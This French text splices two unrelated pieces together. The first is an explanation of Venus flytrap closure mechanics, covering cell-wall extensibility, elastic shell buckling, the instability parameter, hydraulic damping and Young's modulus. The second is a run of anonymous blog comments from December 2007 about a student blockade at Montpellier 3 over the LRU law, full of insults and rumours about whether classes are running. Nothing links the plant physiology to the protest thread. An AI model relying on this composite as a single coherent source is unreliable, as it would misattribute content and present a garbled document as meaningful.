Coupe transversale d'un lobe parallèlement à la nervure médiane. Le passage de la lumière à travers les parois indiquent que de nombreux micelles de cellulose sont parallèles au plan de la coupe et limite l'extensibilité des parois dans ce plan. Coupe transversale d'un lobe perpendiculairement à la nervure médiane du piège. Les parois de l'épiderme supérieur laissent passer la lumière ainsi que les grains d'amidon et très légèrement les vaisseaux. Les parois restant sombres ne sont pas renforcées par des micelles orientés de cellulose et sont susceptibles d'extension.

De même une coupe perpendiculaire à la nervure médiane d'un piège ouvert paralysé, soumise à une plasmolyse, se courbe. Une coupe du même piège faite parallèlement à la nervure médiane, soumise aux mêmes conditions, ne change pratiquement pas de courbure. Ceci traduit des possibilités d'extensibilité différentes.
Les auteurs en tirent les conclusions qu’avant la fermeture du piége le cortex est sous pression et que ce sont les épidermes inextensibles qui maintiennent la forme du piège. Lors de la fermeture du piège on assiste à une modification de l’extensibilité de l’épiderme inférieur
Le fait que les cellules participant à l'ouverture du piège soient différentes de celles qui participent à la fermeture, et surtout le fait qu'un piège peut se fermer et s'ouvrir un nombre limité de fois suggère fortement que des phénomènes irréversibles de croissance sont à l'oeuvre.

De nouvelles expérimentations non destructives utilisent des modélisations physiques

Comment décrire la géométrie des pièges : par des mesures de l’accroissement relatif de la face inférieure.
A l’aide d’empreintes et de marques sur la face inférieure des pièges de Dionée, Y. Forterre et al., (2006) ,reprenant des techniques déjà utilisées, étudient la dynamique de fermeture de ces pièges, (fermeture en 0,1 s). Ils mesurent également de façon détaillée les déformations subies par cette face. Les accroissements des cellules sont sensiblement différents de ceux déterminées par Fagerberg et Allain. En effet selon les premiers les cellules de la marge du piège se raccourcissent mais le fait marquant est un important allongement de cette face dans une direction perpendiculaire à la nervure médiane, qui peut atteindre 9% au voisinage de celle-ci.
Comment décrire la géométrie des pièges : par des mesures des rayons de courbures de la face inférieure.
Ces nouvelles études font intervenir la physique des transferts de liquide dans des milieux poreux et celle de l'élasticité des solides en plaques minces. Les physiciens qui étudient ce dernier sujet et qui s'intéressent en particulier aux phénomènes de flambage, apportent un nouvel éclairage sur les temps caractéristiques du mouvement chez les végétaux. La théorie de ces phénomènes est complexe, ces travaux faisant appel à des calculs mathématiques qui ne peuvent qu’être évoqués ici. (Voir les articles de J. M. Skotheim, L. Mahadevan, (2005) et de Forterre et al. (2005)). Ces physiciens s’intéressent aux valeurs des deux rayons de courbure du piège c'est-à-dire à ceux mesurés dans des plans respectivement perpendiculaires et parallèles à la nervure médiane. (Pour les sens de courbure et les rayons de courbure voir les liens de cette page).

La physique de l’élasticité des solides en plaque mince offre un modèle expliquant les changements brusques de forme du piège.

Les phénomènes à l’œuvre dans la fermeture du piège de la Dionée sont analogues à ceux qui président aux changements de courbure d’une calotte sphérique élastique. Le changement des courbures des mâchoires de ce piège nécessite une accumulation d’énergie pour arriver à un seuil d’instabilité mécanique. Une fois ce seuil atteint, cette énergie peut se convertir en énergie cinétique, correspondant à un mouvement brusque de fermeture du piège par un phénomène analogue au retournement d’une coque élastique (instabilité de flambage).

L’énergie élastique du système dépend de son rayon de courbure dit "naturel" (contrôlé par la plante) dans un plan perpendiculaire à la nervure principale. Pour supprimer l’influence de la courbure exercée par les tissus selon un axe parallèle à la nervure médiane, des bandes étroites sont découpées perpendiculairement à cette nervure. Ces lambeaux se courbent spontanément et leur rayon de courbure, dit naturel selon cette orientation est mesuré. L’énergie élastique dépend aussi de la valeur d'un paramètre a qui détermine l'existence et la position d'un seuil d'instabilité du système. Ce paramètre (sans dimension) peut s'écrire
a= L4/ (h2.r2) où L est une longueur typique de la feuille (L = (longueur du piége parallèlement à la nervure médiane + largeur du piège perpendiculairement à la nervure)/4), h est son épaisseur et r un rayon de courbure du piège ouvert. Pour une feuille dont le paramètre a est supérieur à une valeur critique d'environ 0,8, une très faible déformation de la feuille, consécutive par exemple aux évènements qui suivent la détection de la présence d'un insecte dans le piège, induit un brusque changement du sens de courbure des faces du piège et donc celui-ci se referme, sa forme passe alors de concave à convexe.

C’est le principe à l’œuvre dans l’ouverture des boîtes de bonbons où il faut appuyer sur le couvercle métallique jusqu’à ce que le changement brusque de courbure de celui-ci permette d’ouvrir la boîte. (Voir aussi l’objet utilisé le 6 juin 1944, appelé criquet, qui est un exemple de la conversion de l’énergie accumulée puis libérée et transformée dans ce cas pour partie en son.)

Le propre de nombreux mouvements observés expérimentalement est de comporter des oscillations autour d’un point d’équilibre et une phase d’amortissement. L'exemple type de ce mouvement est celui d'une masse suspendue à un ressort qui, après avoir été lâchée, oscille et finit par s'arrêter. Dans tous les cas les oscillations sont dues à une force de rappel "élastique", correspondant à une énergie potentielle présentant un minimum au point d'équilibre. L'amortissement est toujours dû à des forces "de frottement" qui dissipent progressivement l'énergie cinétique du système.

Le temps de fermeture du piège est beaucoup grand que celui prévu par la théorie.

Des considérations théoriques permettent un calcul du temps que mettrait le piége de Dionée pour se fermer dans le cas où le mouvement serait dû uniquement à une force de rappel élastique. Ce temps est environ 100 fois plus petit que le temps mesuré. La prise de vue à une fréquence de 400 images à la seconde ne montre pas d’oscillation et met donc en évidence un amortissement très efficace.

Qu’est ce qui peut ralentir la fermeture des pièges de Dionée ? Où l’on se souvient qu’une plante c’est beaucoup d’eau.

Cet amortissement étant trop important pour être dû aux frottements de la plante sur l'air, les auteurs de ces études l’ont attribué à la résistance à la traversée des pores des parois des cellules de la plante par l'eau interstitielle nécessaire à l'accroissement de volume de la face inférieure du piège, détectable par l'allongement de celle-ci dans la direction perpendiculaire à la nervure médiane (voir plus haut). Plus il y a de pores, plus le transfert se fait rapidement. Ces auteurs ont pu évaluer l'ordre de grandeur du temps de fermeture du piège pour un tel amortissement. Ce temps est proportionnel à la viscosité du fluide, ainsi qu'au carré de l'épaisseur de la feuille et inversement proportionnel à la fois à la perméabilité de la feuille et à son module d’Young. (Voir encadré plus bas).

Le temps ainsi calculé théoriquement est compatible avec le temps de fermeture observé expérimentalement, ce qui conforte l'hypothèse d'un tel amortissement "hydraulique" lors de la fermeture du piège de Dionée.

Remerciements :
Les auteurs remercient M. Didier Schmaus, chercheur à l’institut des NanoSciences de Paris et professeur de physique à l’université Paris 7 pour les conseils et les explications qu’il nous a prodigués dans la partie modélisations physiques de ce texte.

Vocabulaire :
Module d’Young : définition
Ce coefficient (E) précise le lien de proportionnalité entre une contrainte (force par unité de surface) exercée dans une direction et l’allongement relatif de l’objet dans cette direction.
E = (force /surface) / ( Δl/lo ); Le module d’Young mesuré chez la Dionée a pour valeur 10 MPa. Cette valeur est à comparer à celle de la fibre de coton 10 000 MPa, ou à celle de la paroi de l’algue Nitella (700 MPa) valeurs faibles par rapport à celle de l’acier 200 000 MPa. Chez la Dionée une contrainte de 0,1 MPa entraîne un allongement de 1%.

Anonyme a dit…

slt "un travailleur"

Certe sarko a été élu, mais, le fait que ce soit le président de la république n'implique pas que le peuple doit se soumettre a toutes ces décisions, le peuple doit être concerté et chaque réforme doit être en accord avec le peuple car c'est de la vie du peuple dont on parle,
Crois-tu que le passage en force de ce qu'il juge bien doit être approuvé par des personnes qui en leur âme et conscience percoivent que cela n'est pas ce qu'il y a de mieux et de bénéfique pour l'avenir !

Doit-on se taire ?

Sommes nous dans une dictature ?

Devrions-nous avoir peur de nous exprimer ?

Devons-nous nous soumettre à un prédident de la REPUBLIQUE ?

Anonyme a dit…

Hmm...

Si vous n'aviez pas envoyé Miossec en justice sur son choix de fermer la fac, on serait tous vacances et ce serait bien.

Maintenant, je suis là, à La Réunion, obligé de soutenir les bloqueurs parce que, sans ça, je vais rater mes cours.

L'AG me semble avoir été une mascarade, en effet.

Mais la violence des gens me débecte. Cette stupidité animale m'afflige.

Anonyme a dit…

CRS comité de réponse Sarkosienne
étudiants en grève CRS
mal logés sur la Seine CRS
avocat dans un tribunal CRS

Anonyme a dit…

demain, AG chez moi...
y a assez de place pour environ 20 personnes..comme d'hab..

Anonyme a dit…

salut est ce que quelqu'un est allé a la fac et sait comment ca se passe en ce moment??? merci

Anonyme a dit…

vous abusez les gars c pas possible de rebloquer. franchement c'est minable qu'une petite poignée de petites personnes revote le blocage... vous savez vous n'etes pas majoritaire dans cette fac, vous le serez jamais, et arretez de prendre votre cas pour une généralité... vous n'etes rien, c'est tout, et laissez nous bosser car nous, on a un avenir.....

Anonyme a dit…

VIVE SARKOZY!!!

Anonyme a dit…

ouai, heu salut tout le monde heu voila heu alors demain j'organise une ag chez moi! Ouai! et on votera le deblocage a 15! Ouai! car nous on est légitime et majoritaire! ouai! et na voila! (mdr le foutage de gueule sur les blokeurs, prenez conscience que vous etes stupides a toujours vous rendre interessants. vous n'avez pas un peu un sentiment d'inferiorité??? vous vous sentez toujours exclu non?? allez juste voir un psychiatre, il vous aidera, mais ne bloké pa la fac, n'empechez pas les hommes normaux d'aller etudier et traviller)

Anonyme a dit…

Toujours pas de nouvelles de la fac ?

Tintin1501 a dit…

Revenu ce matin de la fac.

A 8h30 : RAS.

Les cours reprennent normalement.

Cordialement.

(http://mtp3lru.xooit.fr/)

Anonyme a dit…

Ah ben en voilà une bonne nouvelle!

Auraient-ils retrouvé la raison nos amis du mouvement?

Ou alors se sont-ils retrouvés trop peu nombreux?

Tintin1501 a dit…

Je pense personnellement que la seconde réponse est la bonne...

Cordialement.

Anonyme a dit…

une amie a moi est allé a la fac!
tout se déroule normalement!
et de toute façon si on les bloque les profs ont dit qu'ils s'enfermerait ans les préfa comme d'hab!

Anonyme a dit…

je pense surtout qu'il nous prepare un coup genre puisqu'on voulait tant reprendre les cours nous enfermer dans des batiments bloqués...

Tintin1501 a dit…

Que de spéculations ...

Tout se passe normalement pour l'instant et avec le nombre de vigiles déployés je ne pense pas que cela change.

Allez en cours, mais participez au débat, prenez part au mouvement contre la LRU... au lieu d'attendre des nouvelles de son PC pour savoir si il faut sortir dans le froid.

Cordialement.

PS : Et il fait froid ce matin...
http://mtp3lru.xooit.fr/

Anonyme a dit…

Anonyme a dit...
demain, AG chez moi...
y a assez de place pour environ 20 personnes..comme d'hab..

18 décembre 2007 07:20



Là c'est plus une AG...
C'est une partouze...


DF

Anonyme a dit…

Les cours ont repris normalement, ce qui veut dire que les bloqueurs sont plus nombreux en AG mais sur le terrain ya plus personnes !

C'est la preuve que le blocage n'est plus d'actualité.

Tous en cours !!

Anonyme a dit…

on devrait faire gaffe de pas les enterrer trop vite a mon avis c surtout à cause des vigiles qu'ils ont rien pu faire ils reviendront

Anonyme a dit…

jusqu'a present les infos sur ce blog étaient intéressantes pour les gens qui ne peuvent pas se daplacer pour X ou Y raison. Et la hier on nous annonce un blocage!!! Donc bien évidemment puisque l'on ne peut pas se déplacer facilement on reste chez nous et qu est ce quon apprend: aucun mouvement des etudiants mobilisés et tous en cours... Alors pourrait - on savoir ce quil en est vraiment de cette mobilisation?

Anonyme a dit…

Lol eh ben on vote le blocage après rien du tout.
Faut alors retirer cet article il ne sert à rien si il n'y a pas eu d'application.
Tous en cours alors

Anonyme a dit…

On voit a quel point vous etes des dures les mecs, vous votez un blocage a 3 potes et ensuite vu qu'il y a plus de vigile que vous, vous restez couché....

Donc, c'est tres bien, ne vous levez pas avant le 21 a 17H, apres vous pouvez bloquer jusqu'au 6 au soir sans probleme...

Bonnes fetes

Anonyme a dit…

vous deconnez!! j'en reviens!! tout est bloqué!!!!

Anonyme a dit…

Don't worry, y'a cours :)

Anonyme a dit…

arretez vos conneries ya cours....

Anonyme a dit…

Jy sui allé c'matin à 8H30. Blocage total annoncé à 12H !

Anonyme a dit…

Ouais c est ça...et pk pas à minuit aussi?

Anonyme a dit…

Jy sui allé c'matin à 8H30. Blocage total annoncé à 12H !

c vrai?? source fiable??

Anonyme a dit…

Blocage total à 12h ??

ah ça va pas être possible, l'ag a décidé que le blocage se ferait à 7h30...
C'est trop tard, il fallait se lever avant !

Anonyme a dit…

Source : les bloqueurs qui distribuent les tracts un peu partout dans la fac

Anonyme a dit…

En somme, beaucoup de bruit pour rien au final...

Anonyme a dit…

Mais selon leur calendrier voté en AG, il y a une assemblée du comité de mobilisation à 12H?

Comment vont-ils faire?

ça sent la panique à bord, là!

ça commence à être du n'importe quoi!

Anonyme a dit…

Quelqu'un sait si l'amphi A est occupé? Parce que j'ai cours là-bas normalement...

Anonyme a dit…

Source : les bloqueurs qui distribuent les tracts un peu partout dans la fac

18 décembre 2007 10:16

ok merci a toi! tu es rentré du coup?

Anonyme a dit…

BLOCAGE OU PAS BLOCAGE?

Anonyme a dit…

Ce matin, pas de blocage!

Il paraît que les bloqueurs (trop peu nombreux ce matin!) vont réessayer de bloquer les bâtiments vers midi!

Mais ce n'est pas sûr qu'ils y arrivent!

Anonyme a dit…

Faut pas crier victoire trop vite...

Blocage.

Anonyme a dit…

je suis catrhine de neve

Anonyme a dit…

Ils n'arriveront pas à rebloquer, j'en suis sûr !!

VIVE LES COURS !

Anonyme a dit…

Y a rien, pas vu de bloqueurs où alors 2/3 qui refilent des tracts.

Anonyme a dit…

vous me faite tous rire avec vos com...pff franchement entre les pro et les antibloqueurs.Faite l'amour mais pas la guerre.On est tous dans le meme sac c'est à dire que la loi a été voté malheureusement^^

Anonyme a dit…

Pas mal le blocage de ce matin...le réveil n'a pas sonné?? Peut-être avez-vous eu peur de faire mal aux vigiles?? Vous etes ridicules...Ne vous inquietez pas bientôt les vacances papa maman vous réconforteront "mais non mon petit il te reste quelques neurones"...vous pourriez peut-etre demander un cerveau au père-noel?? ou alors un voeu pour 2008 "cette année j'ai décidé d'etre intelligent"...Malheureusement papa noel n'existe plus et vous resterez les médiocres que vous étes...

Anonyme a dit…

C'est dommage que les étudiants en viennent à se diviser comme ça...

Anonyme a dit…

Plus ca va moins je comprends. Une AG ou se retrouvent 150 personne qui votent le blocage à 80 contre 70, c'est quoi ce délire. Quand a dire que le réferendum était truqué et que les étudiants ont voté plusieurs fois, ce n'est plus une carte qu'ils doivent avoir mais des confettis. Ce qui me désole le plus c'est que personne n'a encore compris que tout était manipulé politiquement surtout par les enseignants du Snesup qui tirent les ficelles. Ce sont ces enseignants qui refusent la LRU surtout, ben oui, va falloir qu'ils se lèvent le cul et qu'ils bossent un peu plus. MDR
Dernière chose la violence n'a jamais rien arrangé !!!!

Anonyme a dit…

donc pas de blocage alors oki je pars en cours youpiiii

Anonyme a dit…

peut-on me dire si je dois me bougé le cul svp?

Anonyme a dit…

que de la gueule les bloqueurs !!

Anonyme a dit…

"Jy sui allé c'matin à 8H30. Blocage total annoncé à 12H !"

info ou intox?

Anonyme a dit…

Blocage à 12h venez nombreux !!!

Anonyme a dit…

c'est vraiment bete de voir les etudiant s'entreflinguer pour un gouvernement de merde et leur loi pourri arrètons la guerre!!!! sur ce moi je dis bonne chance au lycéen de la nouvelle generation car cette loi les visent à bout portant.

Anonyme a dit…

les flics sont armés et les vigiles il en manque pas , faites quand meme gaff meme si je pense que le blocage c'est pas la meilleur solution actullement.

Anonyme a dit…

anonyme de 10h23 pour ce qui est de l'amphi A en sortant de cours vers 10h30 g vu des grévistes rentrer dans l'amphi A alors ca depend à quelle heure t'a cours... car à moin d'un blocage cet aprem... g eu cours ce matin les salles sont fermées un vigil passe demande au prof jusqu'à quel heure on a cour, et vient refermer à la fin de notre cour donc sans table ni chaise ca leur sera dure de bloquer!!! à moin de voler leurs clés aux vigiles je vois pas lol.

Anonyme a dit…

Plusieurs vigiles devant chaque porte.. ça sera pas facile de rebloquer, et surtout difficilement acceptable par la majorité silencieuse (souvent bavarde sur le blog;..)

Anonyme a dit…

AVIS A TOUS CEUX UI NE SONT PAS ALLE VOTER ET QUI RACONTE N'IMPORTE QUOI!!!!

Pour tous ceux qui disent que certains étudiants sont allé voté plusieurs fois au référendum renseignez vous avant de raconter des conneries, car après le vote on nous a fait un petit trou dns la carte etudiant: DONC IMPOSSIBLE DE VOTER PLUSIEURS FOIS!!!!

mais si votre mauvaise fois vous amuse et si surtout ça vous eclate de vous ridiculisez une fois de plus alors tant mieux!!!!

Anonyme a dit…

je pense comme beaucoup d'étudiants qu'il serait utile de faire d'autres formes de révolte;
Bloquer une fac c'est diviser les étudiants alors qu'il faudrait les rassembler tous uni contre une loi inacceptable.

Les AGs sont bizarrement démocratique, elles le seront quand "le bureau" sera totalement impartial!

Les bonnes résolutions de 2008 : "Lutter AUTREMENT"...

Moi c'est clair après 8 semaines de "vacances" je n'ai pas envie de retourner à la fac!
Je n'irais pas travailler cette semaine, une assemblée générale dans mon cerveau a voté pour la sequestration à l'unanimité de mon corps dans mon studio !

Je ne sais pas quand mon corps va être débloqué, il est très heureux d'être ainsi bloqué !!!

Ceux qui vont en cours : Vous ne trouvez pas que c'est bizarre d'aller en cours maintenant après tout ce temps et reprendre à l'endroit ou on s'était arrêté avant le blocage, avec de l'autre coté de la fenetre les vigiles avec leur manteau SECURITE et leurs bergers allemand qui ressemblent à Rintintin ?

Anonyme a dit…

j'aime rintintin <3

Anonyme a dit…

anonyme de 11H19 renseigne toi avant de parler. Plusieurs ont affirmé avoir voter 3fois: 1x avec la carte d'étudiant et 2 x avec les certificats de scolarité....

eh oui

Anonyme a dit…

les profs aussi se mettent a faire n'importe quoi, ils annulent les cours pensant que c'est bloquer. Du coup que doit on faire?? Le blocage a été voté... Pk n'est il pas effectif, et autre question, le sera-il plus tard? demain?
merci de répondre...

Anonyme a dit…

Bonjour. Je suis étudiants a la faculté de Paul Valéry. Je suis contre la loi LRU, contre le blocage et contre l'intervention des CRS dans un établissement étudiants. Jeudi 13 Décembre un vote démocratique était organisé pour que la majorité des étudiants de Montpellier 3 s'exprime sur le blocage ou non du campus. La large majorité des étudiants a voté contre le blocage. Donc reprise normale des cours le lundi 17 Décembre. L'amphi A est encore réquisitionné par des grévistes qui maintenant passe plus pour des branleurs que pour autre chose. Le blocage est revoté pour le mardi 18 Décembre 7H30.
Quand on va a l'encontre de la decision d'une majorité, c'est aller a l'encontre de toute definition de liberté. La majorité des grévistes dénonce un système politique anti democratique et on voit des bloqueurs qui vont dans le sens opposé de la majorité des etudiants de Paul Valéry. Comment est ce qu'on appelle cela??? C'est de la destruction de démocratie et de l'hypocrisie.
Empecher un étudiant d'aller en cours c'est l'empecher d'exercer son droit premier qui est celui d'étudier. Dans tout cela j'en conclue que les grévistes sont aussi cons que nos chere hommes et femmes politiques. Ensuite on s'étonne que les CRS soient envoyés pour faire de la répression. Mais c'est pas les CRS qu'il faut blamer mais ceux qui les envoient. Les policiers ne font que repondre à des ordres.
Maintenant je m'adresse directement aux bloqueurs. Je pense que vous n'êtes qu'une bande de branleur. L'université Paul Valéry est la derniere Faculté a bloquer sur Montpellier. Vous êtes tous pathétiques et si on me proposais de faire parti d'un corps de CRS pour vous foutre dehors je dirais oui. Je ne suis pas de droites, mais j'ai horreur qu'on me prive de mes libertés dont la premiere est d'étudier. Vous êtes tous en train de vous enfermer dans un mouvements arbitraires. Vous ne savez plus pourquoi vous bloquez. La majorité des gens qui votent le blocage sont des branleurs, des gens qui ne pensent qu'a rester chez eux a rien foutre.
Je m'appelle Aymeric Gardeil, étudiant en licence 1 de musique et je revendique mon droit d'étudier. Et comme le dit si bien Minato Namikaze ca sera la guerre. Vous vouliez vous battre??? Ca marche mais ne vous plaignez pas après.

Anonyme a dit…

Bonjour alors il semble que les etudiants bloqueurs n'aient pas eu l'occasion de faire ce qu'ils avaient prevu pour ce matin.

Une question. Est ce que vous trouvez democratique de bloquer l'universite apres decision d'un vote en AG ou nous les etudiants etrangers (IEFE) nous ne comprenons pas tout ce que vous dites.
Ecrire et lire on l'apprend mais comprendre des gens qui marmonnent dans un micro et qui souvent ne font pas l'effort d'articuler, Merci mais ce n'est pas democratique.
Contrairement a d'autres je ne cautionne pas l'intervention des CRS.
J'espere que vous trouverez un autre moyen (plus efficace) de vous faire entendre.

Anonyme a dit…

Est ce que quelqu'un sait si oui ou non y a cour cette aprem ? -_-

«Les plus anciens ‹Précédent   401 – 600 sur 896   Suivant› Les plus récents»